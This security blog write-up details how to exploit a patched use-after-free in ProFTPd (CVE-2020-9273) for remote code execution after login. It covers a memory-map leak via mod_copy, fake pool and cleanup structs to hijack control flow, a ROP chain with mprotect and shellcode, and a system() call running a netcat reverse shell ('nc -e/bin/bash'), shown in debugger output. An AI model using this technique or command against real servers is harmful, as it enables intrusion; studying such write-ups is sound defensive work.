Having fun with a Use-After-Free in ProFTPd (CVE-2020-9273)
Dear Fellowlship, today’s homily is about building a PoC for a Use-After-Free vulnerability in ProFTPd that can be triggered once authenticated and it can lead to Post-Auth Remote Code Execution. Please, take a seat and listen to the story.
Introduction
This post will analyze the vulnerability and how to exploit it bypassing all the memory exploit mitigations present by default (ASLR, PIE, NX, Full RELRO, Stack Canaries etc).
First of all I want to mention:
- @DUKPT_ who is also working on a PoC for this vulnerability, for his approach on overwriting
gid_tab->pool
which is the one I decided to use on the exploit (will be explained later in this post) - Antonio Morales @nosoynadiemas for discovering this vulnerability, you can find more information about how he discovered it on his post Fuzzing sockets, part 1: FTP servers
Vulnerability
To trigger the vulnerability, we need to first start a new data channel transference, then interrupt through command channel while data channel is still open.
Using the data channel, we can fill heap memory to overwrite the resp_pool
struct, which is session.curr_cmd_rec->pool
at this time.
The result of triggering the vulnerability successfully is full control over resp_pool
:
gef➤ p p
$3 = (struct pool_rec *) 0x555555708220
gef➤ p resp_pool
$4 = (pool *) 0x555555708220
gef➤ p session.curr_cmd_rec->pool
$5 = (struct pool_rec *) 0x555555708220
gef➤ p *resp_pool
$6 = {
first = 0x4141414141414141,
last = 0x4141414141414141,
cleanups = 0x4141414141414141,
sub_pools = 0x4141414141414141,
sub_next = 0x4141414141414141,
sub_prev = 0x4141414141414141,
parent = 0x4141414141414141,
free_first_avail = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>,
tag = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>
}
Obviously, as there are not valid pointers in the struct, we end up on a segmentation fault on this line of code:
first_avail = blok->h.first_avail
blok
, which coincides with the p->last
value, is 0x4141414141414141
at that time
The ProFTPd Pool Allocator
The ProFTPd pool allocator is the same as the Apache.
Allocations here take place using palloc()
and pcalloc()
, which are wrapping functions for alloc_pool()
ProFTPd Pool Allocator works with blocks, which are actual glibc heap chunks.
Each block has a block_hdr
header structure that defines it:
union block_hdr {
union align a;
/* Padding */
#if defined(_LP64) || defined(__LP64__)
char pad[32];
#endif
/* Actual header */
struct {
void *endp;
union block_hdr *next;
void *first_avail;
} h;
};
blok->h.endp
points to the end of current blockblok->h.next
points to the next block in a linked listblok->h.first_avail
points to the first available memory within this block
This is the alloc_pool()
code:
static void *alloc_pool(struct pool_rec *p, size_t reqsz, int exact) {
size_t nclicks = 1 + ((reqsz - 1) / CLICK_SZ);
size_t sz = nclicks * CLICK_SZ;
union block_hdr *blok;
char *first_avail, *new_first_avail;
blok = p->last;
if (blok == NULL) {
errno = EINVAL;
return NULL;
}
first_avail = blok->h.first_avail;
if (reqsz == 0) {
errno = EINVAL;
return NULL;
}
new_first_avail = first_avail + sz;
if (new_first_avail <= (char *) blok->h.endp) {
blok->h.first_avail = new_first_avail;
return (void *) first_avail;
}
pr_alarms_block();
blok = new_block(sz, exact);
p->last->h.next = blok;
p->last = blok;
first_avail = blok->h.first_avail;
blok->h.first_avail = sz + (char *) blok->h.first_avail;
pr_alarms_unblock();
return (void *) first_avail;
}
As we can see, it first tries to use memory within the same block, if no space, is allocates a new block with new_block()
and updates the pool last block on p->last
.
Pool headers, defined by pool_rec
structure, are stored right after the first block created for that pool, as we can see on make_sub_pool()
which creates a new pool:
struct pool_rec *make_sub_pool(struct pool_rec *p) {
union block_hdr *blok;
pool *new_pool;
pr_alarms_block();
blok = new_block(0, FALSE);
new_pool = (pool *) blok->h.first_avail;
blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;
memset(new_pool, 0, sizeof(struct pool_rec));
new_pool->free_first_avail = blok->h.first_avail;
new_pool->first = new_pool->last = blok;
if (p) {
new_pool->parent = p;
new_pool->sub_next = p->sub_pools;
if (new_pool->sub_next)
new_pool->sub_next->sub_prev = new_pool;
p->sub_pools = new_pool;
}
pr_alarms_unblock();
return new_pool;
}
Actually, make_sub_pool()
is responsible for creating the permanent pool aswell, which has no parent. p
will be NULL
when doing it.
Looking at make_sub_pool()
code, you can realize that it gets a new block, and just after the block_hdr
headers, pool_rec
headers are entered and blok->h.first_avail
is updated to point right after it.
Then, entries of the new created pool are initialized.
The p->cleanups
entry is a pointer to a cleanup_t
struct:
typedef struct cleanup {
void *data;
void (*plain_cleanup_cb)(void *);
void (*child_cleanup_cb)(void *);
struct cleanup *next;
} cleanup_t;
Cleanups are interpreted by the function run_cleanups()
and registered with the function register_cleanup()
A chain of blocks can be freed using free_blocks()
:
static void free_blocks(union block_hdr *blok, const char *pool_tag) {
union block_hdr *old_free_list = block_freelist;
if (!blok)
return;
block_freelist = blok;
while (blok->h.next) {
chk_on_blk_list(blok, old_free_list, pool_tag);
blok->h.first_avail = (char *) (blok + 1);
blok = blok->h.next;
}
chk_on_blk_list(blok, old_free_list, pool_tag);
blok->h.first_avail = (char *) (blok + 1);
blok->h.next = old_free_list;
}
Exploitation Analysis
We have control over a really interesting pool_rec
struct, now we might need to search for primitives that allow us to get something useful from this vulnerability, like obtaining Remote Code Execution.
Leaking memory addresses
Obviously to exploit this vulnerability predictable memory addresses is a requirement before using primitives, as in this case, the exploitation consists on playing with pointers, structs and memory writes.
Leaking memory addresses on this situation is really hard, as we are on a cleanup/session finishing process and to trigger the vulnerability we actually need to generate an interruption.
I first thought about reading /proc/self/maps
file, which can be read by any process, even with low privileges.
Perhaps in theory it would work, unfortunately ProFTPd uses stat
syscall to retrieve file size, as stat
over pseudo-files like maps
returns zero, this breaks transfer, and 0 bytes are returned back to client on data channel.
Thinking on additional ways to do it, I realized about mod_copy
, which is a module in ProFTPd that allows you to copy files within the server.
We can use mod_copy
to copy the file from /proc/self/maps
to /tmp
, and once there, we perform a normal transfer over the file at /tmp
which is not a pseudo-file now, so /proc/self/maps
content will be returned to attacker.
This leak is really interesting as it gives you addresses for every segment, and even the filename of the shared libraries, which sometimes contain versions like libc-2.31.so
, and this is really interesting for exploit reliability, we could use offsets for specific libc versions.
Hijacking the control-flow
We have to transform our control over session.curr_cmd_rec->pool
into any write primitive allowing us to reach run_cleanups()
somehow with an arbitrary cleanup_t
struct.
Looking for struct entry writes, there was nothing useful that would allow us direct write-what-where primitives (would be a lot easier this way).
Instead, the only way we can use to write something on arbitrary addresses is to use make_sub_pool()
(at pool.c:415
), which is called with cmd->pool
as argument at some point:
struct pool_rec *make_sub_pool(struct pool_rec *p) {
union block_hdr *blok;
pool *new_pool;
pr_alarms_block();
blok = new_block(0, FALSE);
new_pool = (pool *) blok->h.first_avail;
blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;
memset(new_pool, 0, sizeof(struct pool_rec));
new_pool->free_first_avail = blok->h.first_avail;
new_pool->first = new_pool->last = blok;
if (p) {
new_pool->parent = p;
new_pool->sub_next = p->sub_pools;
if (new_pool->sub_next)
new_pool->sub_next->sub_prev = new_pool;
p->sub_pools = new_pool;
}
pr_alarms_unblock();
return new_pool;
}
This function is called at main.c:287
from _dispatch()
function with our controlled pool as argument:
...
if (cmd->tmp_pool == NULL) {
cmd->tmp_pool = make_sub_pool(cmd->pool);
pr_pool_tag(cmd->tmp_pool, "cmd_rec tmp pool");
}
...
As you can see new_pool->sub_next
has now the value of p->sub_pools
, which is controlled, then we enter on new_pool->sub_next->sub_prev
the new_pool
pointer.
This means, we can write to any arbitrary address the value of new_pool
, which apparently, appears not to be so useful at all, as the only relationship we have with this newly created pool cmd->tmp_pool
is that cmd->tmp_pool->parent
is equal to resp_pool
as we are the parent pool for it.
Also the only value we control is the new_pool->sub_next
, which we actually use for the write primitive.
What more interesting primitives do we have?
On a previous section we explained how the ProFTPd pool allocator works, when a new pool is created, p->first
and p->last
point to blocks used for the pool, we are interested in the p->last
as it is the block that is actually used, as we can see on alloc_pool()
at pool.c:570
:
...
blok = p->last;
if (blok == NULL) {
errno = EINVAL;
return NULL;
}
first_avail = blok->h.first_avail;
...
first_avail
is the pointer to the limit between used data and available free space, which is where we will start to allocate memory.
Our pool is passed to pstrdup()
multiple times for string allocation:
char *pstrdup(pool *p, const char *str) {
char *res;
size_t len;
if (p == NULL ||
str == NULL) {
errno = EINVAL;
return NULL;
}
len = strlen(str) + 1;
res = palloc(p, len);
if (res != NULL) {
sstrncpy(res, str, len);
}
return res;
}
This function calls palloc()
which ends up calling alloc_pool()
The allocations are mostly non-controllable strings, which seem not useful to us, except from one allocation at cmd.c:373
on function pr_cmd_get_displayable_str()
:
...
if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
pstrdup(cmd->pool, res), 0) < 0) {
if (errno != EEXIST) {
pr_trace_msg(trace_channel, 4,
"error setting 'displayable-str' command note: %s", strerror(errno));
}
}
...
As you can see, cmd->pool
(our controlled pool) is passed to pstrdup()
, and as seen at cmd.c:363
:
...
if (argc > 0) {
register unsigned int i;
res = pstrcat(p, res, pr_fs_decode_path(p, argv[0]), NULL);
for (i = 1; i < argc; i++) {
res = pstrcat(p, res, " ", pr_fs_decode_path(p, argv[i]), NULL);
}
}
...
res
points to our last command sent
...
if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
pstrdup(cmd->pool, res), 0) < 0) {
if (errno != EEXIST) {
pr_trace_msg(trace_channel, 4,
"error setting 'displayable-str' command note: %s", strerror(errno));
}
}
...
This means if we send arbitrary data instead of a command, we could enter custom data on pool block space, and as we can corrupt p->last
we can make blok->h.first_avail
point to any address we want, and this means we can overwrite through a command any data.
Unfortunately, it is not like our corruption from data channel, as here our commands are treated as strings, and not binary data as the data channel does.
This means we are very limited on overwriting structs or any useful data.
Also, some allocations happen before, and the heap from the intial value of blok->h.first_avail
to that value when pstrdup()
‘ing our command will be full of strings, and non valid pointers which could likely end up on a crash before reaching run_cleanups()
.
Initially, I decided to use blok->h.first_avail
to overwrite cmd->tmp_pool
entries with arbitrary data.
This pool is freed with destroy_pool()
at main.c:409
on function _dispatch()
:
...
destroy_pool(cmd->tmp_pool);
cmd->tmp_pool = NULL;
...
This means if we control the cmd->tmp_pool->cleanups
value when reaching clear_pool()
we would have the ability to control RIP and RDI once run_cleanups()
is called:
void destroy_pool(pool *p) {
if (p == NULL) {
return;
}
pr_alarms_block();
if (p->parent) {
if (p->parent->sub_pools == p) {
p->parent->sub_pools = p->sub_next;
}
if (p->sub_prev) {
p->sub_prev->sub_next = p->sub_next;
}
if (p->sub_next) {
p->sub_next->sub_prev = p->sub_prev;
}
}
clear_pool(p);
free_blocks(p->first, p->tag);
pr_alarms_unblock();
}
As you can see clear_pool()
is called, but after accessing some of the entries of the pool, which must be either NULL
or a valid writable address.
Once clear_pool()
is called:
static void clear_pool(struct pool_rec *p) {
/* Sanity check. */
if (p == NULL) {
return;
}
pr_alarms_block();
run_cleanups(p->cleanups);
p->cleanups = NULL;
while (p->sub_pools) {
destroy_pool(p->sub_pools);
}
p->sub_pools = NULL;
free_blocks(p->first->h.next, p->tag);
p->first->h.next = NULL;
p->last = p->first;
p->first->h.first_avail = p->free_first_avail;
pr_alarms_unblock();
}
We can see that run_cleanups()
is called directly without more checks / memory writes.
When calling function run_cleanups()
:
static void run_cleanups(cleanup_t *c) {
while (c) {
if (c->plain_cleanup_cb) {
(*c->plain_cleanup_cb)(c->data);
}
c = c->next;
}
}
Looking at cleanup_t
struct:
typedef struct cleanup {
void *data;
void (*plain_cleanup_cb)(void *);
void (*child_cleanup_cb)(void *);
struct cleanup *next;
} cleanup_t;
We can control RIP with c->plain_cleanup_cb
and RDI with c->data
Unfortunately, corrupting cmd->tmp_pool
is difficult, as a string displayable-str
is appended right after our controllable data, and right after our p->cleanup
entry there are some entries that are accessed on destroy_pool()
before reaching run_cleanups()
.
@DUKPT_ who is also working on a PoC for this vulnerability was overwriting gid_tab->pool
. Which is a more reliable technique as there are no pointers after our controllable data, so when displayable-str
is appended, nothing serious will be broken, and also, here, instead of corrupting a pool_rec
structure, we corrupt a pr_table_t
structure, so we can point gid_tab->pool
to memory corrupted from the data channel, which also accepts NULLs and we can craft a fake pool_rec
structure with an arbitrary p->cleanup
value to a fake cleanup_t
struct which will be finally passed to run_cleanups()
.
The interesting use of gid_tab
is also that gid_tab->pool
is passed to destroy_pool()
on pr_table_free()
with argument gid_tab
:
int pr_table_free(pr_table_t *tab) {
if (tab == NULL) {
errno = EINVAL;
return -1;
}
if (tab->nents != 0) {
errno = EPERM;
return -1;
}
destroy_pool(tab->pool);
return 0;
}
This is how pr_table_t
looks like:
struct table_rec {
pool *pool;
unsigned long flags;
unsigned int seed;
unsigned int nmaxents;
pr_table_entry_t **chains;
unsigned int nchains;
unsigned int nents;
pr_table_entry_t *free_ents;
pr_table_key_t *free_keys;
pr_table_entry_t *tab_iter_ent;
pr_table_entry_t *val_iter_ent;
pr_table_entry_t *cache_ent;
int (*keycmp)(const void *, size_t, const void *, size_t);
unsigned int (*keyhash)(const void *, size_t);
void (*entinsert)(pr_table_entry_t **, pr_table_entry_t *);
void (*entremove)(pr_table_entry_t **, pr_table_entry_t *);
};
...
typedef struct table_rec pr_table_t;
As you can see after tab->pool
(tab->flags
, tab->seed
and tab->nmaxents
) there are no pointers so the string appended will not trigger crashes
So, what is the plan?
1) Craft a fake block_hdr
structure that will be pointed to by p->last
2) Enter on fake_blok->h.first_avail
a pointer to gid_tab
minus some offset, where offset is depending on the number of allocations and their size, so when pstrdup()
copies our arbitrary command, fake_blok->h.first_avail
value is exactly the address of gid_tab
to fit our address
3) Enter on p->sub_next
the address of tab->chains
so when pr_table_kget()
is called, NULL
is returned to make our arbitrary command being allocated.
4) Send a custom command with a fake pr_table_t
, actually, just the tab->pool
is needed, and point fake_tab->pool
to a fake pool_rec
struct
5) Craft the fake pool_rec
struct, point fake_pool->parent
, fake_pool->sub_next
and fake_pool->sub_prev
to any writable address, and fake_pool->cleanup
to a fake cleanup_t
struct containing our arbitrary RIP and RDI values
This is the result of exploiting the hijack technique:
*0x4242424242424242 (
$rdi = 0x4141414141414141,
$rsi = 0x0000000000000000,
$rdx = 0x4242424242424242,
$rcx = 0x0000555555579c00 → <entry_remove+0> endbr64
)
As you can see c->plain_cleanup_cb
has value 0x4242424242424242
, and c->data
has value 0x4141414141414141
.
Which means RIP and RDI are fully controlled.
Getting RCE
As explained, our main target is reaching run_cleanups()
function with an arbitrary address, or with a non-arbitrary address but controlling it’s content. This allow us to obtain full RIP and RDI control, which taking into account that we already have predictable addresses for every segment, means a Remote Code Execution is likely to be possible.
Some ways to obtain Remote Code Execution:
Stack pivot, ROP and shellcode execution
As we control both RIP and RDI, we could search for useful gadgets that would allow us to redirect control-flow using a ROPchain to bypass NX.
When reaching run_cleanups()
…
gef➤ p *c
$7 = {
data = 0x563593915280,
plain_cleanup_cb = 0x7f875ab201a1 <authnone_marshal+17>,
child_cleanup_cb = 0x4141414141414141,
next = 0x4242424242424242
}
gef➤ x/2i c->plain_cleanup_cb
0x7f875ab201a1 <authnone_marshal+17>: push rdi
0x7f875ab201a2 <authnone_marshal+18>: pop rsp
gef➤
When entering on the stack pivot gadget:
→ 0x7f875ab201a1 <authnone_marshal+17> push rdi
0x7f875ab201a2 <authnone_marshal+18> pop rsp
0x7f875ab201a3 <authnone_marshal+19> lea rsi, [rdi+0x48]
0x7f875ab201a7 <authnone_marshal+23> mov rdi, r8
0x7f875ab201aa <authnone_marshal+26> mov rax, QWORD PTR [rax+0x18]
0x7f875ab201ae <authnone_marshal+30> jmp rax
We crafted previously our resp_pool
struct to point rax
to the address where an address pointing near a ret
instruction is stored. So when:
mov rax, QWORD PTR [rax+0x18]
is executed, we get in rax
the address, which will be used just on next instruction: jmp rax
.
As it is near a ret
instruction, we will finally execute our ROPchain as we pointed rsp
right before our ROPchain, and a ret
instruction just got executed.
gef➤ p $rax
$5 = 0x563593915358
gef➤ x/gx $rax + 0x18
0x563593915370: 0x00007f875a9fc679
gef➤ x/i 0x00007f875a9fc679
0x7f875a9fc679 <__libgcc_s_init+61>: ret
At the time of jmp rax
:
0x7f875ab201a3 <authnone_marshal+19> lea rsi, [rdi+0x48]
0x7f875ab201a7 <authnone_marshal+23> mov rdi, r8
0x7f875ab201aa <authnone_marshal+26> mov rax, QWORD PTR [rax+0x18]
→ 0x7f875ab201ae <authnone_marshal+30> jmp rax
0x7f875ab201b0 <authnone_marshal+32> xor eax, eax
0x7f875ab201b2 <authnone_marshal+34> ret
--------------------------------------------------------------
gef➤ p $rax
$6 = 0x7f875a9fc679
gef➤ x/i $rax
0x7f875a9fc679 <__libgcc_s_init+61>: ret
And we can see stack was pivoted successfully:
gef➤ p $rsp
$7 = (void *) 0x563593915358
gef➤ x/gx 0x563593915358
0x563593915358: 0x00007f875aa21550
gef➤ x/i 0x00007f875aa21550
0x7f875aa21550 <mblen+112>: pop rax
ROPchain will setup a syscall call to SYS_mprotect
, which will change memory protection for a heap range to RXW
. Then, we will jump into the shellcode, thus finally achieving Remote Code Execution
If we check the mappings with gdb we can see that part of the heap is now RWX
, which is actually where the shellcode resides:
0x0000563593889000 0x00005635938cb000 0x0000000000000000 rw- [heap]
0x00005635938cb000 0x0000563593915000 0x0000000000000000 rw- [heap]
0x0000563593915000 0x0000563593916000 0x0000000000000000 rwx [heap]
0x0000563593916000 0x000056359394e000 0x0000000000000000 rw- [heap]
Now we are jumping to shellcode, as it now resides on executable memory, so Remote Code Execution succeed:
0x7f875aa3d229 <funlockfile+73> syscall
→ 0x7f875aa3d22b <funlockfile+75> ret
↳ 0x563593915310 push 0x29
0x563593915312 pop rax
0x563593915313 push 0x2
0x563593915315 pop rdi
0x563593915316 push 0x1
0x563593915318 pop rsi
Chaining all this together into an exploit, this is an screenshot of the successful exploitation of this vulnerability using the ROP approach:
ret2libc or ret2X
You can jump to any function and control one argument, this means you can call any function with an arbitrary argument. You can reuse register values for other arguments aswell, but you rely on current registers to be valid for target function, eg.: an invalid pointer would trigger a crash
The approach I followed with this method is calling system()
and pointing RDI to a custom command string (netcat reverse shell) I leave in heap with a predictable address.
First we reach destroy_pool()
with the fake pool_rec
struct, actually we reuse entries from our initially controlled struct:
gef➤ p *p
$1 = {
first = 0x563f5c9c6280,
last = 0x7361626174614472,
cleanups = 0x563f5c9a62d0,
sub_pools = 0x563f5c9a6298,
sub_next = 0x563f5c9a62a0,
sub_prev = 0x563f5c9a0a90,
parent = 0x563f5c94a738,
free_first_avail = 0x563f5c94a7e0 "\260\251\224\\?V",
tag = 0x563f5c9a526e ""
}
gef➤ p *resp_pool
$2 = {
first = 0x563f5c9a62d0,
last = 0x563f5c9a6298,
cleanups = 0x563f5c9a62a0,
sub_pools = 0x563f5c9a0a90,
sub_next = 0x563f5c94a738,
sub_prev = 0x563f5c94a7e0,
parent = 0x563f5c9a526e,
free_first_avail = 0x563f5c9a526e "",
tag = 0x563f5c9a526e ""
}
Then, destroy_pool()
is going to call clear_pool()
, which finally ends up calling run_cleanups()
with our fake cleanup_t
struct, pointed to by p->cleanups
:
gef➤ p *c
$3 = {
data = 0x563f5c9a62f0,
plain_cleanup_cb = 0x7fca503f1410 <__libc_system>,
child_cleanup_cb = 0x4141414141414141,
next = 0x4242424242424242
}
gef➤ x/s c->data
0x563f5c9a62f0: "nc -e/bin/bash 127.0.0.1 4444"
As we can see c->plain_cleanup_cb
(future RIP) points to __libc_system()
, and c->data
points to our command string stored on heap
The result if we continue, is the execution of a new process as part of the command execution: process 35209 is executing new program: /usr/bin/ncat
And finally obtaining a reverse shell as the user you logged in with into the FTP server.
RCE Video Demo also available on GitHub (same directory where the exploit resides)
Patch
You can find the GitHub issue and patches for this vulnerability here.
Conclusion
On this post we analyzed and demonstrated exploitation for a Use-After-Free in ProFTPd, and could get full Remote Code Execution even with all the protections turned on (ASLR, PIE, NX, RELRO, STACKGUARD etc)
Perhaps authentication is needed, this is sometimes a situation an attacker has, but can not go forward without a RCE exploit like this.
You can find the ROP approach exploit here.
You can find the other exploit using system()
and netcat here.
EoF
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.